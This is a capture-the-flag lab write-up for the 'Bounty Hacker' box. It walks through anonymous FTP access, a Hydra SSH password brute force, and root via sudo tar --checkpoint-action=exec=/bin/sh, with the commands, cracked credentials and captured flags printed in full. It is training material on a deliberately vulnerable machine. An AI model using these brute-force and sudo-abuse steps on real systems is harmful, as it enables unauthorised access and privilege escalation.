Overview
Bounty Hacker is a straightforward box that teaches the classic
FTP-to-SSH-to-root pipeline. Anonymous FTP leaks a username and a custom
password wordlist, Hydra brute-forces SSH in seconds, and a misconfigured
sudo /bin/tar rule gives instant root via GTFOBins checkpoint abuse.
nmap → 21/FTP, 22/SSH, 80/HTTP
↓
ftp anonymous → task.txt (author: lin) + locks.txt (26 passwords)
↓
hydra SSH brute-force → lin:RedDr4gonSynd1cat3
↓
ssh lin@ → user.txt: THM{CR1M3_SyNd1C4T3}
↓
sudo -l → (root) /bin/tar
↓
sudo tar --checkpoint-action=exec=/bin/sh → root
↓
root.txt: THM{80UN7Y_h4cK3r}
Port Scan & Service Discovery
$ nmap -sV -sC -T4 -p- --min-rate 5000 -Pn 10.48.146.252
| Port | Service | Version | Notes |
|---|---|---|---|
21/tcp | FTP | vsftpd 3.0.5 | Anonymous login allowed |
22/tcp | SSH | OpenSSH 8.2p1 | Brute-force target |
80/tcp | HTTP | Apache 2.4.41 | Cowboy Bebop themed page |
Three services running. FTP with anonymous login is the obvious first target.
FTP — Anonymous Access
Anonymous FTP login yields two files:
1.) Protect Vicious. 2.) Plan for Red Eye pickup on the moon. -lin
Task list author: lin — our target SSH username.
rEddrAGON ReDdr4g0nSynd!cat3 Dr@gOn$yn9icat3 R3DDr46ONSYndIC@Te ... RedDr4gonSynd1cat3 ← the one ... ReDSynd1ca7e
A 26-entry wordlist of Dragon Syndicate leet-speak variations. Combined with
username lin, this is a textbook SSH brute-force setup.
Hydra SSH Brute-Force
$ hydra -l lin -P locks.txt ssh://10.48.146.252 -t 16 -f -V [ATTEMPT] target 10.48.146.252 - login "lin" - pass "rEddrAGON" - 1 of 26 ... [22][ssh] host: 10.48.146.252 login: lin password: RedDr4gonSynd1cat3 [STATUS] attack finished for 10.48.146.252 (valid pair found)
Hit on attempt 10 of 26. Password: RedDr4gonSynd1cat3
SSH — User Shell & Flag
$ ssh lin@10.48.146.252 Password: RedDr4gonSynd1cat3 $ cat ~/Desktop/user.txt THM{CR1M3_SyNd1C4T3}
sudo /bin/tar → GTFOBins Root
$ sudo -l User lin may run the following commands: (root) /bin/tar
tar is a well-known
GTFOBins sudo vector.
The --checkpoint-action flag triggers arbitrary command execution
during archive operations:
$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh # whoami root # cat /root/root.txt THM{80UN7Y_h4cK3r}
Attack Chain
task.txt → username lin, locks.txt → 26-entry password wordlistlin:RedDr4gonSynd1cat3 — hit on attempt 10 of 26cat ~/Desktop/user.txt → THM{CR1M3_SyNd1C4T3}--checkpoint-action=exec=/bin/sh → THM{80UN7Y_h4cK3r}Vulnerabilities
| Finding | Location | Severity | Impact |
|---|---|---|---|
| sudo /bin/tar (GTFOBins) | sudoers config | Critical | Instant root via checkpoint callback |
| Weak SSH password | SSH (22) | High | Brute-forced in 10 attempts from custom wordlist |
| Anonymous FTP with sensitive files | FTP (21) | High | Username and password wordlist exposed |
Takeaways
tar’s --checkpoint-action flag makes it a trivial
privesc vector. Cross-reference all sudo binaries with GTFOBins before deployment.
Full-Chain Exploit Script
The complete chain is automated in bounty_hacker.sh — dependency
check, nmap recon, FTP extraction, Hydra brute-force, SSH flag retrieval, and sudo
tar privilege escalation.
$ chmod +x bounty_hacker.sh $ ./bounty_hacker.sh 10.48.146.252 [+] Task author : lin [+] Wordlist : locks.txt (26 entries) [+] SSH credentials — lin : RedDr4gonSynd1cat3 [+] user.txt → THM{CR1M3_SyNd1C4T3} [+] root.txt → THM{80UN7Y_h4cK3r}
Tools Used
| Tool | Purpose |
|---|---|
nmap | Port scanning and service enumeration |
ftp | Anonymous FTP file retrieval |
hydra | SSH credential brute-force |
sshpass | Non-interactive SSH authentication |
tar | Privilege escalation (GTFOBins checkpoint abuse) |
bounty_hacker.sh | Full-chain automated exploit (Bash) |